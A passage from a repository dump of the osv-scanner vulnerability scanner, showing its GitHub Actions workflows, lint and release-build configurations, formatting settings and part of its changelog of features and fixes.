actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1 with: name: image-testdata-${{ github.run_number }}-${{ github.run_attempt }} path: cmd/osv-scanner/scan/image/testdata/ - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run test action uses: ./.github/workflows/test-action with: codecov_token: ${{ secrets.CODECOV_TOKEN }} generators: permissions: contents: read # to fetch code (actions/checkout) name: (re)generate code runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false ref: ${{ inputs.commit }} - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run generators run: go generate ./... - run: | git diff --name-only \ | xargs -I '{}' bash -c \ 'echo "::error file={}::This needs to be regenerated by running \`go generate ./...\`" && false' release-helper: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest needs: - format - lint - tests - osv-scan steps: - name: Print Scripts env: OUTPUT: | git fetch upstream && git tag ${{ inputs.version }} ${{ inputs.commit }} && git push upstream ${{ inputs.version }} shell: bash run: | echo $OUTPUT ================================================ FILE: .github/workflows/renovate-validator.yml ================================================ name: Renovate Config Validator on: push: branches: [main, v2] paths: - "renovate.json" pull_request: branches: [main, v2] paths: - "renovate.json" # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: validate: runs-on: ubuntu-latest permissions: contents: read # to fetch code (actions/checkout) steps: - name: Checkout code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Nodes.js uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0 with: node-version: latest - name: Validate Renovate Config run: npx --yes --package renovate -- renovate-config-validator ================================================ FILE: .github/workflows/scorecards.yml ================================================ # This workflow uses actions that are not certified by GitHub. They are provided # by a third-party and are governed by separate terms of service, privacy # policy, and support documentation. name: Scorecards supply-chain security on: # For Branch-Protection check. Only the default branch is supported. See # https://github.com/ossf/scorecard/blob/main/docs/checks.md#branch-protection branch_protection_rule: # To guarantee Maintained check is occasionally updated. See # https://github.com/ossf/scorecard/blob/main/docs/checks.md#maintained schedule: - cron: "32 22 * * 6" push: branches: ["main"] # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: analysis: name: Scorecards analysis runs-on: ubuntu-latest permissions: # Needed to upload the results to code-scanning dashboard. security-events: write # Needed to publish results and get a badge (see publish_results below). id-token: write # Uncomment the permissions below if installing in a private repository. # contents: read # actions: read steps: - name: "Checkout code" uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: "Run analysis" uses: ossf/scorecard-action@4eaacf0543bb3f2c246792bd56e8cdeffafb205a # v2.4.3 with: results_file: results.sarif results_format: sarif # (Optional) Read-only PAT token. Uncomment the `repo_token` line below if: # - you want to enable the Branch-Protection check on a *public* repository, or # - you are installing Scorecards on a *private* repository # To create the PAT, follow the steps in https://github.com/ossf/scorecard-action#authentication-with-pat. # repo_token: ${{ secrets.SCORECARD_READ_TOKEN }} # Public repositories: # - Publish results to OpenSSF REST API for easy access by consumers # - Allows the repository to include the Scorecard badge. # - See https://github.com/ossf/scorecard-action#publishing-results. # For private repositories: # - `publish_results` will always be set to `false`, regardless # of the value entered here. publish_results: true # Upload the results as artifacts (optional). Commenting out will disable uploads of run results in SARIF # format to the repository Actions tab. - name: "Upload artifact" uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0 with: name: SARIF file path: results.sarif retention-days: 5 # Upload the results to GitHub's code scanning dashboard. - name: "Upload to code-scanning" uses: github/codeql-action/upload-sarif@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 with: sarif_file: results.sarif ================================================ FILE: .github/workflows/snapshots.yml ================================================ name: Snapshots on: schedule: - cron: "47 18 * * *" workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: update: permissions: contents: write # to fetch and commit code actions: write # to manually dispatch checks on the pull request pull-requests: write # Create pull requests runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: ./scripts/run_tests.sh || true env: TEST_ACCEPTANCE: true TEST_VCR_MODE: replaywithnewepisodes UPDATE_SNAPS: always - uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0 with: token: ${{ secrets.PR_TOKEN_BOT }} title: "test: update snapshots" body: > The snapshots have changed, probably due to OSV advisories being changed. Please review the differences to make sure that they're expected! branch: "bot/update-snapshots" author: "osv-robot " commit-message: "test: update snapshots" ================================================ FILE: .github/workflows/staleness.yml ================================================ name: "Close stale issues and PRs" permissions: read-all on: schedule: - cron: "0 * * * *" jobs: stale: permissions: issues: write pull-requests: write runs-on: ubuntu-latest steps: - uses: actions/stale@b5d41d4e1d5dceea10e7104786b73624c18a190f # v10.2.0 with: days-before-stale: 60 days-before-close: 14 operations-per-run: 100 remove-stale-when-updated: true exempt-issue-labels: "good first issue,V2 Wishlist,backlog" exempt-all-assignees: true ignore-updates: false stale-issue-label: stale stale-issue-message: | This issue has not had any activity for 60 days and will be automatically closed in two weeks See https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md for how to contribute a PR if you're interested in helping out. stale-pr-label: stale stale-pr-message: | This pull request has not had any activity for 60 days and will be automatically closed in two weeks close-issue-label: "autoclosed" close-issue-message: | Automatically closing stale issue close-pr-label: "autoclosed" close-pr-message: | Automatically closing stale pull request ================================================ FILE: .github/workflows/test-action/action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: test description: "Runs go tests" inputs: codecov_token: description: "Token for uploading coverage reports to Codecov" required: true runs: using: composite steps: - name: Run go test shell: bash env: TEST_ACCEPTANCE: true run: ./scripts/run_tests.sh - name: Upload coverage to Codecov uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2 with: token: ${{ inputs.codecov_token }} fail_ci_if_error: true ================================================ FILE: .github/workflows/title.yml ================================================ # Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: Title on: # `pull_request_target` is only required when editing PRs from forks. pull_request: types: - opened - edited - reopened permissions: pull-requests: read jobs: check: runs-on: ubuntu-latest steps: - uses: amannn/action-semantic-pull-request@48f256284bd46cdaab1048c3721360e808335d50 # v6.1.1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} ================================================ FILE: .github/workflows/zizmor.yml ================================================ name: GitHub Actions Security Analysis with zizmor 🌈 on: pull_request: paths: [".github/workflows/**"] push: branches: ["main"] permissions: {} jobs: zizmor: runs-on: ubuntu-latest permissions: security-events: write contents: read actions: read steps: - name: Checkout repository uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Run zizmor 🌈 uses: zizmorcore/zizmor-action@71321a20a9ded102f6e9ce5718a2fcec2c4f70d8 # v0.5.2 ================================================ FILE: .gitignore ================================================ .history/ .vscode/ .idea/ /dist/ /osv-scanner /temp /coverage.out /coverage.html *.tar *.pprof .go-version node_modules osv-scalibr-portal # we don't want to check in this file as it's very very large /internal/semantic/testdata/redhat-versions-generated.txt ================================================ FILE: .golangci-lint-version ================================================ v2.9 ================================================ FILE: .golangci.yaml ================================================ version: "2" linters: default: all # prettier-ignore disable: - cyclop # - err113 # will re-add later (another-rex) - exhaustruct # overkill (g-rath) - forcetypeassert # too hard (g-rath) - funlen # - funcorder # - gochecknoglobals # disagree with, for non changing variables (another-rex) - gocognit # - goconst # not everything should be a constant - gocyclo # - godot # comments are fine without full stops (g-rath) - godox # to-do comments are fine (g-rath) - ireturn # disagree with, sort of (g-rath) - lll # line length is hard (g-rath) - maintidx # - mnd # not every number is magic (g-rath) - nestif # - noinlineerr # - nonamedreturns # disagree with, for now (another-rex) - tagliatelle # we're parsing data from external sources (g-rath) - testpackage # will re-add later (another-rex) - varnamelen # maybe later (g-rath) - wrapcheck # too difficult, will re-add later (another-rex) - wsl # disagree with, for now (g-rath) - wsl_v5 # disagree with, for now (g-rath) settings: depguard: rules: regexp: files: - "!**/internal/cachedregexp/**" - "!**/internal/testutility/normalize.go" - "!**/pkg/osvscanner/exclude.go" deny: - pkg: regexp desc: Use github.com/google/osv-scanner/v2/internal/cachedregexp instead exhaustive: default-signifies-exhaustive: true forbidigo: forbid: - pattern: ^testing.T.Skip pkg: ^testing$ msg: go-snaps needs to know the test has been skipped, so use `testutility.Skip` instead - pattern: ^os.Getwd pkg: ^os$ msg: use `testutility.GetCurrentWorkingDirectory` analyze-types: true gocritic: disabled-checks: - ifElseChain govet: enable-all: true disable: - fieldalignment - shadow nlreturn: block-size: 2 revive: rules: - name: increment-decrement disabled: true - name: blank-imports disabled: false - name: context-as-argument disabled: false - name: context-keys-type disabled: false - name: dot-imports disabled: false - name: empty-block disabled: false - name: error-naming disabled: false - name: error-return disabled: false - name: error-strings disabled: false - name: errorf disabled: false - name: exported disabled: false arguments: # TODO: get these all enabled - "check-private-receivers" # - "check-public-interface" - "disable-checks-on-constants" - "disable-checks-on-functions" - "disable-checks-on-methods" - "disable-checks-on-types" - "disable-checks-on-variables" - name: import-alias-naming disabled: false - name: import-shadowing disabled: false - name: indent-error-flow disabled: false - name: package-comments disabled: false - name: range disabled: false - name: receiver-naming disabled: false - name: redefines-builtin-id disabled: false - name: redundant-test-main-exit disabled: false - name: superfluous-else disabled: false - name: time-naming disabled: false - name: unexported-return disabled: false - name: unreachable-code disabled: false - name: unused-parameter disabled: false - name: use-any disabled: false - name: var-declaration disabled: false - name: var-naming disabled: false arguments: - [] # AllowList - [] # DenyList - - skip-package-name-checks: true exclusions: generated: lax presets: - common-false-positives - legacy - std-error-handling rules: - path: _test\.go linters: - dupl - path-except: _test\.go text: use `testutility.GetCurrentWorkingDirectory` paths: - internal/thirdparty/ - third_party$ - builtin$ - examples$ formatters: enable: - gofmt - goimports exclusions: generated: lax paths: - internal/thirdparty/ - third_party$ - builtin$ - examples$ issues: max-issues-per-linter: 0 max-same-issues: 0 ================================================ FILE: .goreleaser-nightly.yml ================================================ version: 2 before: hooks: - go mod tidy builds: - main: ./cmd/osv-scanner/ id: osv-scanner binary: osv-scanner env: # goreleaser does not work with CGO, it could also complicate # usage by users in CI/CD systems like Terraform Cloud where # they are unable to install libraries. - CGO_ENABLED=0 - GO111MODULE=on mod_timestamp: "{{ .CommitTimestamp }}" flags: - -trimpath ldflags: - "-s -w" - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}.nightly" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}" goos: - linux goarch: - amd64 - main: ./cmd/osv-scanner/ id: osv-scanner-action binary: osv-scanner-action env: # goreleaser does not work with CGO, it could also complicate # usage by users in CI/CD systems like Terraform Cloud where # they are unable to install libraries. - CGO_ENABLED=0 - GO111MODULE=on mod_timestamp: "{{ .CommitTimestamp }}" flags: - -trimpath ldflags: - "-s -w" - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}.nightly_GHAction" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}" goos: - linux goarch: - amd64 - main: ./cmd/osv-reporter/ id: osv-reporter binary: osv-reporter env: # osv-reporter for github action - CGO_ENABLED=0 - GO111MODULE=on mod_timestamp: "{{ .CommitTimestamp }}" flags: - -trimpath ldflags: - "-s -w" - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}" goos: - linux goarch: - amd64 dockers: # Main osv-scanner - image_templates: - "ghcr.io/google/osv-scanner:nightly" dockerfile: goreleaser.dockerfile use: buildx build_flag_templates: - "--pull" - "--label=org.opencontainers.image.title=osv-scanner" - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev" - "--label=org.opencontainers.image.licenses=Apache License 2.0" - "--label=org.opencontainers.image.created={{.Date}}" - "--label=org.opencontainers.image.name={{.ProjectName}}" - "--label=org.opencontainers.image.revision={{.FullCommit}}" - "--label=org.opencontainers.image.version={{.Version}}" - "--label=org.opencontainers.image.source={{.GitURL}}" - "--label=org.opencontainers.image.url={{.GitURL}}" - "--platform=linux/amd64" # Github Action - image_templates: - "ghcr.io/google/osv-scanner-action:nightly" dockerfile: goreleaser-action.dockerfile use: buildx extra_files: - exit_code_redirect.sh build_flag_templates: - "--pull" - "--label=org.opencontainers.image.title=osv-scanner-action" - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev" - "--label=org.opencontainers.image.licenses=Apache-2.0" - "--label=org.opencontainers.image.created={{.Date}}" - "--label=org.opencontainers.image.name={{.ProjectName}}" - "--label=org.opencontainers.image.revision={{.FullCommit}}" - "--label=org.opencontainers.image.version={{.Version}}" - "--label=org.opencontainers.image.source={{.GitURL}}" - "--label=org.opencontainers.image.url={{.GitURL}}" - "--platform=linux/amd64" goarch: amd64 release: disable: true changelog: disable: true ================================================ FILE: .goreleaser.yml ================================================ version: 2 before: hooks: - go mod tidy builds: - main: ./cmd/osv-scanner/ id: osv-scanner binary: osv-scanner env: # goreleaser does not work with CGO, it could also complicate # usage by users in CI/CD systems like Terraform Cloud where # they are unable to install libraries. - CGO_ENABLED=0 - GO111MODULE=on mod_timestamp: "{{ .CommitTimestamp }}" flags: - -trimpath ldflags: - "-s -w" - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}" goos: # Further testing before supporting freebsd # - freebsd - windows - linux - darwin goarch: - amd64 # 32bit does not compile at the moment because of spdx dependency # - '386' # Further testing before supporting arm # - arm - arm64 - main: ./cmd/osv-scanner/ id: osv-scanner-action binary: osv-scanner-action env: # goreleaser does not work with CGO, it could also complicate # usage by users in CI/CD systems like Terraform Cloud where # they are unable to install libraries. - CGO_ENABLED=0 - GO111MODULE=on mod_timestamp: "{{ .CommitTimestamp }}" flags: - -trimpath ldflags: - "-s -w" - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}_GHAction" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}" goos: - linux goarch: - amd64 - main: ./cmd/osv-reporter/ id: osv-reporter binary: osv-reporter env: # osv-reporter for github action - CGO_ENABLED=0 - GO111MODULE=on mod_timestamp: "{{ .CommitTimestamp }}" flags: - -trimpath ldflags: - "-s -w" - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}" - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}" goos: - linux goarch: - amd64 dockers: # Arch: amd64 - image_templates: - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64" dockerfile: goreleaser.dockerfile use: buildx build_flag_templates: - "--pull" - "--label=org.opencontainers.image.title=osv-scanner" - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev" - "--label=org.opencontainers.image.licenses=Apache License 2.0" - "--label=org.opencontainers.image.created={{.Date}}" - "--label=org.opencontainers.image.name={{.ProjectName}}" - "--label=org.opencontainers.image.revision={{.FullCommit}}" - "--label=org.opencontainers.image.version={{.Version}}" - "--label=org.opencontainers.image.source={{.GitURL}}" - "--label=org.opencontainers.image.url={{.GitURL}}" - "--platform=linux/amd64" # Arch: arm64 - image_templates: - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64" dockerfile: goreleaser.dockerfile use: buildx build_flag_templates: - "--pull" - "--label=org.opencontainers.image.title=osv-scanner" - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev" - "--label=org.opencontainers.image.licenses=Apache-2.0" - "--label=org.opencontainers.image.created={{.Date}}" - "--label=org.opencontainers.image.name={{.ProjectName}}" - "--label=org.opencontainers.image.revision={{.FullCommit}}" - "--label=org.opencontainers.image.version={{.Version}}" - "--label=org.opencontainers.image.source={{.GitURL}}" - "--label=org.opencontainers.image.url={{.GitURL}}" - "--platform=linux/arm64" goarch: arm64 # Github Action - image_templates: - "ghcr.io/google/osv-scanner-action:{{ .Tag }}" dockerfile: goreleaser-action.dockerfile use: buildx extra_files: - exit_code_redirect.sh build_flag_templates: - "--pull" - "--label=org.opencontainers.image.title=osv-scanner-action" - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev" - "--label=org.opencontainers.image.licenses=Apache-2.0" - "--label=org.opencontainers.image.created={{.Date}}" - "--label=org.opencontainers.image.name={{.ProjectName}}" - "--label=org.opencontainers.image.revision={{.FullCommit}}" - "--label=org.opencontainers.image.version={{.Version}}" - "--label=org.opencontainers.image.source={{.GitURL}}" - "--label=org.opencontainers.image.url={{.GitURL}}" - "--platform=linux/amd64" goarch: amd64 docker_manifests: - name_template: "ghcr.io/google/osv-scanner:{{ .Tag }}" image_templates: - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64" - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64" - name_template: "ghcr.io/google/osv-scanner:latest" image_templates: - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64" - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64" - name_template: "ghcr.io/google/osv-scanner:stable" image_templates: - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64" - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64" skip_push: "{{ ne .Env.STABLE `true` }}" archives: - formats: binary name_template: "{{ .Binary }}_{{ .Os }}_{{ .Arch }}" ids: - osv-scanner checksum: name_template: "{{ .ProjectName }}_SHA256SUMS" algorithm: sha256 release: draft: true changelog: disable: false ================================================ FILE: .pre-commit-hooks.yaml ================================================ --- - id: osv-scanner name: osv-scanner description: Scan the current working directory for vulnerable dependencies entry: osv-scanner always_run: true pass_filenames: false language: golang args: - "scan" - "source" - "--format=vertical" - "--recursive" - "--verbosity=error" - "." ================================================ FILE: .prettierignore ================================================ **/testdata/** /docs/vendor/** /docs/_sites/** /internal/output/html/*.gohtml ================================================ FILE: .prettierrc.json ================================================ { "$schema": "https://json.schemastore.org/prettierrc", "singleQuote": false, "proseWrap": "preserve", "endOfLine": "lf", "arrowParens": "avoid", "trailingComma": "none", "htmlWhitespaceSensitivity": "ignore" } ================================================ FILE: CHANGELOG.md ================================================ # v2.3.4 ### Features: - [Feature #2571](https://github.com/google/osv-scanner/pull/2571) Enable transitive scanning for Python requirements.txt files using the deps.dev API. - [Feature #2649](https://github.com/google/osv-scanner/pull/2649) Add ability to allow unsafe plugins, logging a warning when any unsafe plugin is enabled. ### Fixes: - [Bug #2630](https://github.com/google/osv-scanner/pull/2630) Improve startup performance on Windows Terminal by updating lipgloss. - [Bug #2599](https://github.com/google/osv-scanner/pull/2599) Ensure the package deprecation enricher respects the same configuration as other plugins. - [Bug #2600](https://github.com/google/osv-scanner/pull/2600) Ensure the Java extractor plugin for call analysis respects the same configuration as other plugins. ### Misc: - Update osv-scalibr from v0.4.2 to v0.4.5. Release notes: [v0.4.3](https://github.com/google/osv-scalibr/releases/tag/v0.4.3), [v0.4.4](https://github.com/google/osv-scalibr/releases/tag/v0.4.4), [v0.4.5](https://github.com/google/osv-scalibr/releases/tag/v0.4.5). # v2.3.3 ### Features: - [Feature #2458](https://github.com/google/osv-scanner/pull/2458) Add `--exclude` flag to skip paths during scanning. - [Feature #2477](https://github.com/google/osv-scanner/pull/2477) Add `pylock` extractor. - [Feature #2475](https://github.com/google/osv-scanner/pull/2475) Add base image info to container scanning output header (in table, markdown and vertical formats). ### Misc: - Update Go version to 1.25.7. - Update osv-scalibr from v0.4.1 to v0.4.2. [Release note](https://github.com/google/osv-scalibr/releases/tag/v0.4.2). - Refactor to better align with osv-scalibr plugins and inventory data structure. # v2.3.2 This release includes performance improvements for local scanning, reducing memory usage and avoiding unnecessary advisory loading. It also fixes issues with MCP's get_vulnerability_details tool, git queries in `osv-scanner.json`, and ignore entry tracking, along with documentation updates. ### Fixes: - [Bug #2415](https://github.com/google/osv-scanner/pull/2415) Add more PURL-to-ecosystem mappings - [Bug #2422](https://github.com/google/osv-scanner/pull/2422) MCP error for get_vulnerability_id because type definition is incorrect. - [Bug #2460](https://github.com/google/osv-scanner/pull/2460) Enable osv-scanner.json git queries - [Bug #2456](https://github.com/google/osv-scanner/pull/2456) Properly track if an ignore entry has been used - [Bug #2450](https://github.com/google/osv-scanner/pull/2450) **Performance:** Avoid loading the entire advisory unless it will actually be used - [Bug #2445](https://github.com/google/osv-scanner/pull/2445) **Performance:** Don't read the entire zip into memory - [Bug #2433](https://github.com/google/osv-scanner/pull/2433) Allow specifying user agent in v2 osvscanner package ### Misc: - [Misc #2453](https://github.com/google/osv-scanner/pull/2453) Switch from gopkg.in/yaml.v3 to go.yaml.in/yaml/v3 - [Misc #2447](https://github.com/google/osv-scanner/pull/2447) Include `bun.lock` as a supported lockfile - [Misc #2444](https://github.com/google/osv-scanner/pull/2444) Document GoVersionOverride in configuration.md # v2.3.1 ### Features: - [Feature #2370](https://github.com/google/osv-scanner/pull/2370) Add support for the `packagedeprecation` plugin via the new `--experimental-flag-deprecated-packages` flag. The result is available in all output formats except SPDX. ### Fixes: - [Bug #2395](https://github.com/google/osv-scanner/pull/2395) Fix license scanning to correctly match new `deps.dev` package names. - [Bug #2333](https://github.com/google/osv-scanner/pull/2333) Deduplicate SARIF outputs for GitHub. - [Bug #2259](https://github.com/google/osv-scanner/pull/2259) Fix lookup of Go packages with major versions by including the subpath of Go PURLs, preventing false positives. ### Misc: - Updated Go version to v1.25.5 to support Go reachability analysis for the latest version. # v2.3.0 This release migrates to the new `osv.dev` and `osv-schema` proto bindings for its internal data models ([#2328](https://github.com/google/osv-scanner/pull/2328)). This is primarily an internal change and should not impact users. ### Features: - [Feature #2321](https://github.com/google/osv-scanner/pull/2321) Add support for license checks for RubyGems. - [Feature #2294](https://github.com/google/osv-scanner/pull/2294) Replace `requirementsenhanceable` extractor with transitive enricher. - [Feature #2344](https://github.com/google/osv-scanner/pull/2344) Use `osduplicate` annotators. ### Fixes: - [Bug #2329](https://github.com/google/osv-scanner/pull/2329) Add `--ignore-scripts` flag to npm lockfile generation. - [Bug #2311](https://github.com/google/osv-scanner/pull/2311) Improve logic for `--all-packages` flag. - [Bug #2309](https://github.com/google/osv-scanner/pull/2309) Exit with a non-zero code when showing help. - [Bug #2316](https://github.com/google/osv-scanner/pull/2316) Pre-commit hook now defaults to scanning current directory instead of failing. - [Bug #1507 (osv-scalibr)](https://github.com/google/osv-scalibr/pull/1507) Interpolate Maven projects before extracting repositories. # v2.2.4 ### Features: - [Feature #2256](https://github.com/google/osv-scanner/pull/2256) Add experimental OSV-Scanner MCP server. (`osv-scanner experimental-mcp`) - [Feature #2284](https://github.com/google/osv-scanner/pull/2284) Update `osv-scalibr` integration, replacing `baseimagematch` with the base image enricher. - [Feature #2216](https://github.com/google/osv-scanner/pull/2216) Warn when vulnerabilities specified in the ignore config are not found during a scan (fixes \#2206). ### Fixes: - [Bug #2305](https://github.com/google/osv-scanner/pull/2305) Ignore common protocols and `.git` suffix when checking if an advisory affects a git repository (fixes \#2291). - [Bug #2300](https://github.com/google/osv-scanner/pull/2300) Ensure the global logger is used in `cmdlogger` and `osv-scalibr` when set (fixes \#2081). - [Bug #2295](https://github.com/google/osv-scanner/pull/2295) Fix Go stdlib license result matching (fixes \#2191). # v2.2.3 ### Features: - [Feature #2209](https://github.com/google/osv-scanner/pull/2209) Add support for resolving git packages that have a version specified. - [Feature #2210](https://github.com/google/osv-scanner/pull/2210) Make the `--experimental-plugins` flag additive by default, and introduce a new `--experimental-no-default-plugins` flag. - [Feature #2203](https://github.com/google/osv-scanner/pull/2203) Update `osv-scalibr` to 0.3.4 for improved dependency extraction. See osv-scalibr changelog for additional information. ### Fixes: - [Bug #2214](https://github.com/google/osv-scanner/pull/2214) Fix issue where `input.Path` was incorrectly constructed on Windows when using the `-L` flag. - [Fix #2241](https://github.com/google/osv-scanner/pull/2241) **Performance:** Greatly reduce memory usage in the local matcher by only loading advisories relevant to the packages being scanned. # v2.2.2 ### Features: - [Feature #2113](https://github.com/google/osv-scanner/pull/2113) Add support for Java reachability analysis to identify uncalled vulnerabilities in JAR files. - [Feature #2177](https://github.com/google/osv-scanner/pull/2177) Automatically parse `osv-scanner-custom.json` files as `osv-scanner.json` custom lockfiles. ### Fixes: - [Bug #2204](https://github.com/google/osv-scanner/pull/2204) Add a warning to guide users to the correct GitHub Action. - [Bug #2202](https://github.com/google/osv-scanner/pull/2202) Fix incorrect exit code when unimportant vulnerabilities are found in non-container scans. - [Bug #2188](https://github.com/google/osv-scanner/pull/2188) Fix handling of absolute paths on Windows. # v2.2.1 ### Fixes - [Bug #2151](https://github.com/google/osv-scanner/issues/2151) Filter by ecosystem before querying. # v2.2.0 OSV-Scanner now supports all OSV-Scalibr features behind experimental flags (`--experimental-plugins`, see details [here](https://google.github.io/osv-scanner/experimental/manual-plugin-selection/))! ### Features: - [Feature #2146](https://github.com/google/osv-scanner/pull/2146) Allow manual OSV-Scalibr plugin selection. - [Feature #2144](https://github.com/google/osv-scanner/pull/2144) Add OSV-Scalibr version to osv-scanner --version output. - [Feature #2021](https://github.com/google/osv-scanner/pull/2021) Add experimental support for running OSV-Scalibr detectors. - [Feature #2079](https://github.com/google/osv-scanner/pull/2079) Fall back to offline extractor if the transitive one fails, so at least direct dependencies are returned. - [Feature #2032](https://github.com/google/osv-scanner/pull/2032) Add summary section at the top of outputs and a 'Fixed Version' column. - [Feature #2076](https://github.com/google/osv-scanner/pull/2076) Support Ubuntu severity type. ### Fixes: - [Bug #2141](https://github.com/google/osv-scanner/pull/2141) Fix OSV-Scanner json scans not matching with correct ecosystem. - [Bug #2084](https://github.com/google/osv-scanner/pull/2084) Show absolute paths when scanning containers. - [Bug #2126](https://github.com/google/osv-scanner/pull/2126) Log and preserve package count before continuing on db error. - [Bug #2095](https://github.com/google/osv-scanner/pull/2095) Pass through plugin capabilities correctly. - [Bug #2051](https://github.com/google/osv-scanner/pull/2051) Properly flag if running on Linux or Mac OSs for plugin compatibility. - [Bug #2072](https://github.com/google/osv-scanner/pull/2072) Add missing "text" property in description fields. - [Bug #2068](https://github.com/google/osv-scanner/pull/2068) Change links in output to go to the specific vulnerability page instead of the list page. - [Bug #2064](https://github.com/google/osv-scanner/pull/2064) Fix SARIF v3 output to include results. ### API Changes: - [API Change #2096](https://github.com/google/osv-scanner/pull/2096) Allow log handler to be overridden. # v2.1.0 ### Features: - [Feature #2038](https://github.com/google/osv-scanner/pull/2038) Add CycloneDX location field to the output source string. - [Feature #2036](https://github.com/google/osv-scanner/pull/2036) Include upstream source information in vulnerability grouping to improve accuracy. - [Feature #1970](https://github.com/google/osv-scanner/pull/1970) Hide unimportant vulnerabilities by default to reduce noise, and adds a `--show-all-vulns` flag to show all. - [Feature #2003](https://github.com/google/osv-scanner/pull/2003) Add experimental summary output format for the reporter. - [Feature #1988](https://github.com/google/osv-scanner/pull/1988) Add support for CycloneDX 1.6 report format. - [Feature #1987](https://github.com/google/osv-scanner/pull/1987) Add support for `gems.locked` files used by Bundler. - [Feature #1980](https://github.com/google/osv-scanner/pull/1980) Enable transitive dependency extraction for Python `requirements.txt` files. - [Feature #1961](https://github.com/google/osv-scanner/pull/1961) Deprecate the `--sbom` flag in favor of the existing `-L/--lockfile` flag for scanning SBOMs. - [Feature #1963](https://github.com/google/osv-scanner/pull/1963) Stabilize various experimental fields in the output by moving them out of the experimental struct. - [Feature #1957](https://github.com/google/osv-scanner/pull/1957) Use a dedicated exit code for invalid configuration files. ### Fixes: - [Bug 